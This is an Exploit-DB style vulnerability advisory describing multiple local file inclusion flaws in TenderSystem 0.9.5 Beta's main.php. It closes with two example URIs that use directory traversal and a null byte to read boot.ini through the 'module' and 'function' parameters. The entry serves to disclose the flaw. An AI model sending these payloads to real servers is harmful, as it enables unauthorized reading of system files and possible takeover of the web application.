TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusions

EDB-ID:

34354

CVE:

N/A


Platform:

PHP

Published:

2009-12-14

source: http://www.securityfocus.com/bid/41792/info

TenderSystem is prone to a multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

TenderSystem 0.9.5 Beta is vulnerable. 

The following example URI's are available:

http://www.example.com/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login

http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html